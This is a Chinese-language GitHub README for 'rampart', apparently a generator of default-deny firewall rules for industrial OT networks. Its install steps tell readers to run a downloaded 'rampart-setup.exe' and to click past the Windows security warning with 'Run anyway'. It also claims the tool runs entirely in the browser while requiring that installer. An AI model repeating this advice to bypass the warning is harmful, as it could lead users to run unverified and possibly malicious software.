kerriesingle633/rampart
GitHub: kerriesingle633/rampart
Rampart 是一款基于 Purdue 模型和 IEC 62443 标准的工业网络安全策略生成工具,通过用户定义 OT 区域自动产出多种主流防火墙可直接部署的拒绝默认策略。
Stars: 0 | Forks: 0
# 🛡️ rampart - 为工业创建安全网络规则
[](https://github.com/kerriesingle633/rampart)
Rampart 帮助您保护工业网络安全。您只需定义您的运营技术区域,应用程序便会生成严格的安全策略。该策略遵循 Purdue 模型和 IEC 62443 标准。应用程序为 Palo Alto、FortiGate、Juniper 和 Cisco ASA 等常见防火墙提供配置结果。它还为标准 Linux 防火墙创建规则。您可以查看清晰的网络连接拓扑图,并获取一份详细解释安全规则的文档。所有操作均在您的 Web 浏览器中完成。
## ⚙️ 系统要求
您的计算机需要满足以下基本要求才能有效运行该软件:
* 操作系统:Windows 10 或 Windows 11。
* 内存:4 GB 或以上 RAM。
* 存储空间:500 MB 可用磁盘空间。
* 浏览器:最新版本的 Google Chrome、Microsoft Edge 或 Mozilla Firefox。
* 网络:需要有效的互联网连接以下载安装程序。
## 📥 下载与安装
请按照以下步骤在您的 Windows 计算机上安装该软件:
1. 访问[此页面下载](https://github.com/kerriesingle633/rampart)最新的安装程序文件。
2. 在您的“下载”文件夹中找到名为 `rampart-setup.exe` 的文件。
3. 双击该文件以启动安装过程。
4. 如果出现 Windows 安全提示,请点击“更多信息”,然后点击“仍要运行”以继续。
5. 按照安装向导中的屏幕提示进行操作。
6. 安装完成后,点击“完成”。
## 🚀 如何使用 rampart
安装软件后,您就可以开始定义您的区域了。
### 定义您的清单
首先,在清单部分输入您的设备。您需要列出每台设备、其用途以及它所在的区域。该工具支持 Purdue 模型,因此您可以将设备分类为 Level 0(传感器)、Level 1(控制器)或 Level 2(现场操作)。
### 映射您的连接
列出设备后,您需要描述它们之间的连接。定义哪些设备需要相互通信以执行其任务。您不需要具备网络协议的技术知识,只需描述信息流即可。软件会处理创建默认拒绝环境的复杂逻辑。这种方法可确保阻止所有您未明确允许的流量。
### 生成您的策略
点击生成按钮以查看结果。应用程序会创建一个显示您网络区域的可视化拓扑图,并生成一份详细的策略文档。您可以将此文档导出给您的防火墙管理员。该工具会为您提供特定防火墙硬件所需的准确语法。
如果您使用 FortiGate,您将获得可直接粘贴到设备中的 CLI 命令。如果您使用 Palo Alto 或 Cisco ASA,该工具会格式化规则以匹配这些系统。对于标准 Linux 环境,您将获得正确的 iptables 命令。
## 📖 常见问题解答
### 我需要是一名网络工程师吗?
不需要。虽然该工具管理着复杂的安全概念,但其界面依然简单。您只需用通俗的语言描述您的网络,应用程序就会将您的描述转换为专业的防火墙规则。
### 软件会将我的数据发送到互联网吗?
您的网络清单将保留在您的本地计算机上。浏览器在本地运行生成规则的逻辑,而不会将您敏感的基础设施详细信息上传到公共服务器。
### 我可以保存我的工作吗?
可以。您可以将清单导出为配置文件,如果以后需要更新规则或添加新区域,可以再次将其导入。
### 如果我犯了错怎么办?
该工具包含验证检查功能。如果您定义的连接违反了 Purdue 模型的标准安全规则,软件会通知您,并建议一种更安全的连接结构方式。
### 我该如何更新工具?
如果发布了新版本,请再次访问下载链接。运行新的安装程序以覆盖当前版本。在此更新过程中,您的数据文件将是安全的。
关键词:critical-infrastructure, cybersecurity, firewall, fortigate, ics-security, iec-62443, network-segmentation, ot-security, palo-alto, purdue-model, scada
标签:IEC 62443, Purdue模型, 后端开发, 工业互联网安全, 工控网络, 网络微隔离, 防火墙策略生成